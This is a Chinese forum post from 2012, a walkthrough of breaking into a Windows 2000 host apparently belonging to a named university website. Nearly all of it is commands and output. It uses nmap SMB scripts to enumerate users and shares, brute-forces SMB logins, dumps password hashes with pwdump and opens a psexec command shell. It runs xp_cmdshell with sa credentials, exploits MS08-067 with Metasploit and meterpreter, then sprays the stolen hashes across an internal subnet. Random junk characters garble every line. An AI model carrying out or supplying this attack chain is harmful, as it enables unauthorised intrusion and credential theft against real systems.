广西师范网站http://202.103.242.241/; c+ L+ \ U0 s, K* }. Q
! }. [' E. N/ g, ~
root@bt:~# nmap -sS -sV 202.103.242.241/ Q8 g# O" P2 d' A6 k! s6 A
' E t: I) w4 A" S* Y# E+ _; sStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST& j; i3 m; m2 Y7 V; _
7 }9 I, I, ?! Z( ^$ l- v0 o# ZNmap scan report for bogon (202.103.242.241)
/ E7 h& e4 O( O f9 [, F( ]4 f5 _7 z* g8 r9 ]; |9 `- e
Host is up (0.00048s latency).1 O0 l" Y& @$ ?% L
6 k" y$ }8 b4 K! M- E; Q+ p
Not shown: 993 closed ports5 S$ w1 v# ?8 s Y
5 c# E; ?7 t; Z3 Q% _* V9 ~# HPORT STATE SERVICE VERSION# D; S r2 a" a7 O5 S* z" g
1 V# q* Z* |" a* j. v
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe), G' S5 x9 e, O6 q5 n' C# v! Q
2 a# ~2 z1 _# s; L7 Y* h% g
139/tcp open netbios-ssn/ `: Y& j8 ~: S5 v- N
/ D5 a9 o* x2 O: T445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
( B% c2 C1 V8 u' a+ U+ Z! a
; L9 Y5 h" R' t: j1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe) C h$ E J" Y2 T
) q. ^( s) Q. w$ G# E$ \
1026/tcp open msrpc Microsoft Windows RPC
6 \9 s; @0 g+ F& h' F* _; @# o+ J! Z2 L( E. w
3372/tcp open msdtc?
2 M& {; u1 t! R" s# Q- w+ O: p! p* p9 E$ ~7 w8 E' _& m3 u7 `% @3 Y
3389/tcp open ms-term-serv?$ ]6 \% H+ g* k4 V4 j) W- ]
0 k$ [8 U3 h4 Z; B; a0 T( E
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
" k: j+ n" s. k# T& l# iSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r2 h0 m% w9 ]9 ^, o# ^
3 H& e4 \6 {, q2 S
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
5 t" P! A8 V0 C9 o
7 }( z( {* s- h/ BSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)# w& W c% o1 V7 q
: e& @* o2 O# l9 j# }( @
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO. R- p- c6 c! [. y' x0 h* j
7 e; b' I. m, d& {9 H, \
SF:ptions,6,”hO\n\x000Z”);
g. \, b0 G: F+ w$ k( c& i2 k+ g- F! U: s
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)8 c0 e+ r7 ~/ p! @; |
0 S% d$ ~9 P+ jService Info: OS: Windows6 [- ~5 k. L7 [ I
! o: ?# P: S" c8 G& I
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . }3 q& W* ~3 B
0 d3 l8 ?' v) s3 C* l0 l
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds2 b$ _, t3 ]2 q, g
( K7 l. s* }5 n! w8 p$ uroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
- j7 I* g3 f7 E2 r% K# P6 v$ |$ o* O1 @
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse7 P# v# _2 G% e
1 o( B6 m: C4 P& ?/ G% o* k | M; ]-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse# P: A- H3 K1 s/ H/ Y
2 f7 ?3 v# w0 a) D
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
. ~! N& L& _/ C, S# a1 q$ X4 [ h9 H) Y& b' }
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse6 M0 G c9 t' S3 b
9 H" b# | p) _$ ^# K$ J-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
# `4 r+ {0 i f3 u7 `
, p; c1 ?- d0 d9 v5 M2 U-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse' n5 z, c" s' C
/ f' `/ q9 _& {7 T! _& R. c-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
. s8 F* ]/ ]( m: C* l
0 Q5 x" I R) n4 T-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
9 z- Q4 j+ d1 J% S$ h
8 a' O/ U! f7 R$ A! f& B& G-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse" V: {/ l; v. Q8 i
" g# ~7 N# ~: \8 X; u-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
- z$ f& [ f" x- ?1 j5 F9 L: E$ T6 t$ n" l5 J6 S
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
! m# s$ a: @: X7 U8 N% W9 K
( |+ S( Y# a" B: P: k-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse. h5 g! {7 {/ L6 \
A" r) [* p" D! I-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse: q: N, G2 ]+ Y, N$ ~# x' o7 l
k4 d! C3 _# J5 K, s
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
( O4 i! I; w1 T
( f7 r+ b4 J9 ^' Q. _; | C-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
4 J0 o% Z2 l7 s8 j# g# ] x! [) N3 l9 k! z
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 : N% a) J3 C' [0 D" w' y
1 b2 m, x, {6 H S' N3 e# R1 \
//此乃使用脚本扫描远程机器所存在的账户名
8 s& V# e4 D2 d( ?
: b! A2 ]! h+ z# O( yStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
4 ~& v4 i$ z n, z# @8 v2 P' a/ u
! M" ~5 k7 B1 F# \Nmap scan report for bogon (202.103.242.241)
1 U5 k' o1 Q4 S. x5 u+ ]. |: K& g3 Y6 m8 d4 {- K3 K4 H
Host is up (0.00038s latency).7 m# h9 G' y Q7 ]) b; R* _
$ b: I0 O9 @2 s0 ?+ E
Not shown: 993 closed ports
! ^/ R/ ^- `; S, }
8 M4 v7 _3 N q. GPORT STATE SERVICE
, u: w8 W$ o1 x. O/ P& E/ B5 ]9 f, Q3 y
135/tcp open msrpc
# Y6 n$ d7 |# z( \4 y8 @
8 E" r- |$ R' w, ~+ B& r139/tcp open netbios-ssn5 C" u' w0 x& t3 x, ^
6 C+ U: N) v5 Y! m/ M
445/tcp open microsoft-ds9 }! e% f R f4 J8 F4 `
( p4 l8 l8 c2 E8 t; Q) C" v/ A- p
1025/tcp open NFS-or-IIS
) O3 x6 C1 g4 y5 E h3 J* ]8 [$ `- O+ e0 B/ P0 V4 x
1026/tcp open LSA-or-nterm
' f- G( ^9 z4 g! U* [' E. b4 ]9 \2 v( v
9 w* I3 }+ S: O) g* T' m3372/tcp open msdtc
3 M9 [+ r' L+ H, d6 i) c2 O: d) Y2 {3 c+ T- I6 F7 a: q
3389/tcp open ms-term-serv
5 D' K6 o5 b( Z7 W
1 U+ r0 P* W5 C' l+ w" M( R- \9 ?MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)- J) P8 {* L0 A! [" H2 m3 o
' t+ m# M( P: `4 A5 _3 E/ SHost script results:
( _; j& _1 j7 G4 X4 V. |( }+ B5 Y+ T3 w9 p! H% M
| smb-enum-users:
+ E3 H4 e5 |$ Q6 T4 k5 x, A r9 d p! X1 J9 T
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果- v/ F& ~- l: X! s9 R
6 g' ?5 ^' D1 D: ]Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
; X# o& G# R: k- v* @) @4 a. C; @7 ^5 U( G
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
* Y- ?" Q3 Q2 U$ ~3 e% x( p1 O3 `( {+ c$ o
//查看共享
1 p3 O% G }8 K, o% S. Y6 i" |; b ?; k( H) U9 z; h- Z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST$ ]( i: C$ o9 ^7 |& w9 c" K. E
( K* [+ j- f* }1 ANmap scan report for bogon (202.103.242.241)
2 i9 E' J/ `! O' C: n: i* }! J8 x- w8 J' G
Host is up (0.00035s latency).7 S x6 Y- ?. ~5 r$ G; h: J; `
" f0 g2 z/ O" U! [4 hNot shown: 993 closed ports1 N' M1 r% j5 e5 D
/ Z* B5 u' G% L$ L& R8 b
PORT STATE SERVICE
6 F2 T S# \1 D; I
3 Q+ {& E2 E, G9 n$ G% }7 ?- I( A. ~. L135/tcp open msrpc
: T5 ?% u# H3 _4 w) ~2 u1 M/ L
, M# [# M3 X( R2 @( e" J139/tcp open netbios-ssn0 [% h. c# K5 _6 q8 Q4 N, e) K
7 ?: b" b; Z' `4 W445/tcp open microsoft-ds, W8 O1 h+ F1 H4 c/ h
5 K4 Y1 K# L U. `
1025/tcp open NFS-or-IIS( V& U- C( o7 U9 d8 O* s2 y1 Q1 k! i1 |
6 [* S5 H/ ~7 H& M4 | m' ?# e$ {
1026/tcp open LSA-or-nterm# F1 @4 ]8 K1 z. y
3 B% j: h4 N, ~2 x! H3372/tcp open msdtc9 ~, T0 N5 \" h+ c j9 T( h
3 W5 f" W' _. F$ k' Q8 _/ L2 K3389/tcp open ms-term-serv
. Z7 F/ h5 T5 @8 D) C# N9 n7 L, W" N3 B# P0 \0 ]& _6 G
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)9 j- q5 [! m r, Q: i [ L
! a/ t, @- h. H; I( F8 V- ]. x0 \
Host script results:
1 p5 C8 \4 B$ _% c6 t" [% M1 I' B2 W3 u) ~) O3 d
| smb-enum-shares:; ?1 S$ \$ x9 ]$ i, G
; Z/ P4 |6 Y" H7 Y' { C
| ADMIN$: s$ |/ U1 r; e3 d. k6 G3 A
" r( u, r( L: c7 N1 Y# D l| Anonymous access: <none>0 A1 w2 _) E8 `! s7 g# K
; a* ^8 T2 @- p' W( n7 i| C$& ?- }+ I+ x7 Z! q2 l1 S
5 E( t' u1 c/ }! i
| Anonymous access: <none>6 s: m* @0 F; ]2 ?- F, Y3 L
4 T7 ^; w. P4 o7 H. b/ y+ F
| IPC$8 y( O" ]$ y+ S) \% z
% _: A' n c" q" v2 B/ u9 e/ L
|_ Anonymous access: READ
# d$ ?) N% |. C6 \5 t# H3 ?2 q* w
4 [9 O& D& L% P0 G; _' p, KNmap done: 1 IP address (1 host up) scanned in 1.05 seconds( J" K1 t" g( q3 M
6 T" ]1 R+ t9 E! a
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 7 J% J& i" _% I) P
( U4 C5 H5 T7 K) u
//获取用户密码; M( E7 o6 |- u3 A6 O
) [2 j$ U% u" r8 H$ a5 V
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST: _- {. ~) a' h/ h; ]/ g
% h0 ^7 Q7 y5 [. p+ cNmap scan report for bogon (202.103.242.2418)
, ]$ x7 p# x9 x
3 z* X" E9 }7 \- W3 iHost is up (0.00041s latency).$ v1 H* x0 q4 y/ U2 I+ z
& T0 M4 K# ^4 Z0 S# ?! ANot shown: 993 closed ports
! }0 ~9 x% Q( J# u' h! f
/ i9 u. F' C" ]4 F, ]PORT STATE SERVICE
+ U% f$ ~; Q2 c0 l. U5 B) K2 W, X7 G; E; n' ~! b
135/tcp open msrpc1 e d6 C \7 P. y$ t
4 F: g5 {8 p( F3 ^139/tcp open netbios-ssn' c8 z0 s( U' w: M7 i6 E
* \2 g1 B$ W! H6 l/ C445/tcp open microsoft-ds0 C2 u4 b- G$ p
% o& [6 J6 q0 s- G) j0 D
1025/tcp open NFS-or-IIS
7 X! x# h3 u3 F/ c) ]: i# e0 v3 r# a) Q$ m
1026/tcp open LSA-or-nterm
( U& z& h$ w: c/ f& p& T& g* t3 l+ Y9 T7 E, i! T2 u6 u8 z
3372/tcp open msdtc, _: H: T' y/ v, P" p& p
8 i$ |, m7 @0 g- m6 B3 a0 m. |
3389/tcp open ms-term-serv5 [$ e; y4 W7 `" q4 l5 G% p5 @& h
' G h% O: V- z+ sMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( g3 i$ ^6 f# c
$ }7 X/ H/ ^8 I3 JHost script results:& Y/ N6 \; o0 m* ^: |
' i. Z! _& c0 L4 B5 z| smb-brute:
& h7 H+ O7 a; j7 u. I1 \' E7 W8 G- J/ e7 u2 n' M7 ]2 c
administrator:<blank> => Login was successful, l& {8 z/ A) ~+ k+ z/ |
: k a3 a- V. E|_ test:123456 => Login was successful2 I9 R( z( e p+ S8 u5 H* b7 y* B
* M- T6 n$ _& g
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds: n! [2 B4 e K2 O
1 z# M+ p- ~8 r/ f7 M9 P$ m& ]
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
! [8 j8 B: z. ]* h# R, t. z- p( L- s! Q9 p* y
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
- `+ C4 r* m. L! e( o
H' G: ?' a. }/ |2 K" f* ~4 uroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
{6 U9 [; K- a- o3 \/ n( ]# K3 e" A. l
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1394 ^, |: l$ N; b7 _2 n$ l
- N7 I8 \; e2 T' X
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
2 ]+ `* m2 g0 T; f% P$ E5 s9 u5 G/ ^/ m; c' H3 }+ ?$ S$ D
Nmap scan report for bogon (202.103.242.241)4 I% A1 {% l1 W" m/ ]5 i
0 ]; M* M/ ?/ LHost is up (0.0012s latency).+ g, x8 M. C/ J/ t; F2 C! @
0 ]) i. h& ^6 S; H4 N
PORT STATE SERVICE
) \: l# x6 `5 J( P K, I- E& \! H9 K" q
135/tcp open msrpc
3 D; s4 f! p3 H) m9 G& p2 i/ S) X8 ]9 g$ C
139/tcp open netbios-ssn
! E+ C. ?4 k; ~5 A: C' u
/ r2 l- F# O7 P+ @8 N6 A445/tcp open microsoft-ds
4 j3 [* t) G3 J* i, A9 U+ l& O l5 }; r% w0 U
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)% }; p/ V( `& R5 p# n
1 E7 t8 Z; k3 ^* K7 }* t7 V1 \ EHost script results:
8 u J( j4 u; |7 S; ? l1 R! v1 ^/ ]
| smb-pwdump:
* V; N. K8 U- F/ m/ \ h- k9 } f7 ~7 M
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************3 e) o D8 S( U* T( w% J' u
; T9 i1 U" f/ v0 O3 T2 L# \| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
" ]3 ^9 m. ~7 U0 {" b
$ n1 x+ s" _6 g2 \$ L3 n| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
; \- r) }4 m+ w' t. r0 V# k- w8 q, O0 k; k N' a
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2; i1 @6 U3 {& x! s3 G8 o+ K z& _2 E, X
7 w; U' d% w0 k; h9 ]0 y
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds- f- I8 [& o- T6 l- g; i- @
' O: w& y+ J0 p1 J0 E- s2 D, jC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell, q3 l+ @1 [9 W& _$ _! ]
6 v* p) _$ ^. p9 x* n+ D-p 123456 -e cmd.exe
) ~% _9 b, u7 ?3 A, e0 _
: S+ |- G4 I) l* rPsExec v1.55 – Execute processes remotely% @7 `6 w0 q: X9 F- P' p; @
' U/ J0 Q0 z; k; K9 f0 DCopyright (C) 2001-2004 Mark Russinovich
3 B6 ^( L2 z' H# g- \' Y0 O4 E) q" r8 t
* l6 `+ q0 f( H$ U1 rSysinternals – www.sysinternals.com
' C/ l) D! z* u# U8 J J- M
3 c9 w# V* g" x4 ?4 EMicrosoft Windows 2000 [Version 5.00.2195]; d: U0 s1 d+ \2 q
1 H2 D2 h" ^3 m) _/ G3 b
(C) 版权所有 1985-2000 Microsoft Corp.
1 H3 u* h A% Y3 U; ^( a# a p6 D) O# f( f
C:\WINNT\system32>ipconfig
* u) L% O8 B5 _! S
3 e' e: m3 R% T2 e mWindows 2000 IP Configuration
0 q# v! @% M* r8 S% G; D: Z/ M' v( k0 s2 \ `; t% t
Ethernet adapter 本地连接:. I( `* {1 l" X( P' e. X
) u+ i! G+ s3 K( \( q7 B& y( AConnection-specific DNS Suffix . :' [9 r$ A- S$ p+ {: Z" P
0 w, t$ i* _6 t: g- W/ x0 lIP Address. . . . . . . . . . . . : 202.103.242.241
: D- C% ?& B+ R0 r
) L+ ^9 t8 B/ ASubnet Mask . . . . . . . . . . . : 255.255.255.03 ?" b& ?# a5 ?& L4 v! L/ R$ k
* N- b' {$ k( s9 x+ f/ Q: U4 t# jDefault Gateway . . . . . . . . . : 202.103.1.1
& L9 Y, E3 o# h% b: F, Z
( _$ k+ f% M' m+ dC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令7 c5 R; h% ?* U* |! |+ Y
6 E- u5 M8 @: V
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞% Z. X9 t6 _' ~+ P% b
% E4 ~- ?; ~) t. C% cStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
- }: R, P0 a2 `& r U/ y0 y a: n4 J
Nmap scan report for bogon (202.103.242.241)0 D( Q! @2 [) o
$ L2 {& O3 P& \1 u* G2 I4 AHost is up (0.00046s latency).3 Y1 X5 U9 G- h4 ^# k; s0 r& g: j
4 P. R6 X& m ~& Z* e/ v
Not shown: 993 closed ports
" v4 }: R7 q2 N5 [* ^
- `( n7 `' s6 S- p7 i/ {7 A4 tPORT STATE SERVICE' f; W: h8 e! i9 b3 }
+ v6 e- f1 T- g; D
135/tcp open msrpc0 J3 a/ f9 H. W
$ T1 I: v# H9 p+ r139/tcp open netbios-ssn5 w* u, t4 p$ Z0 e( E+ m9 R2 [0 `
0 P$ O$ B, C! j. m y6 c- z8 @2 z* |445/tcp open microsoft-ds* @) @6 {1 P7 v# L
. I5 b+ Q+ `$ C0 e
1025/tcp open NFS-or-IIS+ _5 Z6 O" c& n0 G
* @0 P/ R& q3 m$ d9 V
1026/tcp open LSA-or-nterm( {6 l F5 d0 h+ z
$ P5 l5 @( z1 V" M1 t3372/tcp open msdtc% m/ i% \- D H# z5 {
7 K3 _. `9 T& S a: L w2 ]% `3389/tcp open ms-term-serv1 t5 k, S; [3 s& r9 w" `" z2 \
5 E+ i3 l- b, b( M$ O2 FMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
/ n* ^4 g9 N6 S C+ K9 g; E( i7 \# `6 q9 h3 y t/ M+ B1 Q- o0 I
Host script results:% c5 K( O/ r5 c/ e5 y h
' y: w: p( p! |6 \| smb-check-vulns:% Q1 q( w/ d) @
( l8 n4 S; \7 r* s* e! |% V8 {
|_ MS08-067: VULNERABLE
/ [# M2 y; x5 }# R* G- Y1 r/ X N3 q' @6 \# D# v
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
3 w. J% |" b t' y; h% ]7 N0 v! f1 q& r' _
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出% }, @' W s8 B! P) ~* c+ w! @
6 j: D! Y" O+ B& J' }" N6 ?5 H# Lmsf > search ms080 d, s+ U+ |- Y
$ n) H9 S7 Z/ w' \8 E* [' Ymsf > use exploit/windows/smb/ms08_067_netapi
! y; a* b( G5 u. b. T6 R6 I
, L/ H6 y( g2 D; Q+ A- I# z2 Mmsf exploit(ms08_067_netapi) > show options
- z! H9 c5 l" G" a: w. M6 K( L0 I3 }, `; u1 D
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
9 H" w6 ^ j9 O n, s6 M z+ X1 p0 y: E6 k5 o8 `
msf exploit(ms08_067_netapi) > show payloads
* q! R, G3 i# V: P/ S' V& t& \* f( w8 Z4 g' H7 n
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
, h- p3 F9 C% u" S" b0 E; @0 E" J8 g4 `4 B" v* P `' P2 L
msf exploit(ms08_067_netapi) > exploit
/ w3 t) w; d, ]7 g7 g6 x+ C* e. O( {, N( ^* O/ a: l7 q
meterpreter >
. H3 ` N$ Q6 W' a8 t7 d* l
( X0 z: R# V4 Z: ^6 @Background session 2? [y/N] (ctrl+z)3 s: S( U. i% Z. k+ z
1 R3 n0 g' w6 W3 w! N n
msf exploit(ms08_067_netapi) > sessions -l
# h& \9 I3 `6 S* N
; S7 [3 M& f3 f8 [, s+ X5 froot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
3 w9 X: l1 h3 @3 p/ w8 e7 P- y, r s+ k5 C8 E
test; t6 |/ a. }* f/ {/ @- x* M9 L
, p, |6 B" s& t! n$ n+ ]3 u0 F
administrator
# u: s. `) k7 p5 [$ `. J; w l3 m6 M3 c, m
root@bt:/usr/local/share/nmap/scripts# vim password.txt1 \& Z- V7 D( |0 K& D
- k7 }1 ~6 `/ A5 j+ M$ _0 p r
44EFCE164AB921CAAAD3B435B51404EE
, v. T: s! c, y# H. I# V1 b" o' x2 g7 ?7 Y [7 H" Z
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
* p+ I7 u4 |$ d9 P8 w5 s- K( p
( n" D' Q5 ?0 c+ \: w" y //利用用户名跟获取的hash尝试对整段内网进行登录
' [: u2 i7 ~% o$ h: J1 W$ L9 f) \/ u \- e H
Nmap scan report for 192.168.1.105
5 y% i) b" ~6 S1 v/ `6 ^( J# H( @* m' K$ n
Host is up (0.00088s latency).
/ w9 A* x) s& M7 v5 _, s2 K; l j" e9 k
Not shown: 993 closed ports! k: x# b' B. P; Z" ]/ T
! R, d- g' u) k3 c+ M' ^PORT STATE SERVICE) [2 }( D: a/ C) O" u* | b
: g6 t1 I) P2 n+ o" y* w
135/tcp open msrpc
' r o4 Q2 J/ U2 F/ G
' W# c" j8 f* G+ F% U- m139/tcp open netbios-ssn( m0 }# K( S/ V$ ~- s7 v+ _
8 s- g1 \& P8 _$ R445/tcp open microsoft-ds4 f$ Z) O r2 n, n
4 F7 A4 f. n2 Z! @: ?: l9 S2 D7 Z1025/tcp open NFS-or-IIS% {2 S) x8 Q1 t3 k" a$ W l4 t
/ n3 h4 Z: Y3 w4 u
1026/tcp open LSA-or-nterm
- M9 k9 P( ^2 l( Q6 p
" D8 g* |$ _8 L0 Y7 @/ ] M3372/tcp open msdtc
9 V: G; ^. t2 _" K6 |. E0 k8 X8 W+ Z2 h2 g- u8 M
3389/tcp open ms-term-serv9 Q' t" ^" y. c
$ b) V* k: b3 I- v F% r# k
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& z4 z0 y8 v5 Q M6 }, h5 `, u
& E* H7 U; T+ i+ P) BHost script results:
$ ~2 x& R7 @; s& L) z% \- o
5 V0 D' t7 X1 r| smb-brute:
9 G" [% W/ ~' D! m" u( h% @6 K2 W# i! u8 d" l
|_ administrator:<blank> => Login was successful0 f3 T1 P3 e; E4 Q
D d% m% V2 D. B
攻击成功,一个简单的msf+nmap攻击~~·
D: f5 x9 M# m Q5 ~
, d8 p5 t; I( X; i8 O+ d |
发表于 2012-12-4 12:46:42
收藏
支持
反对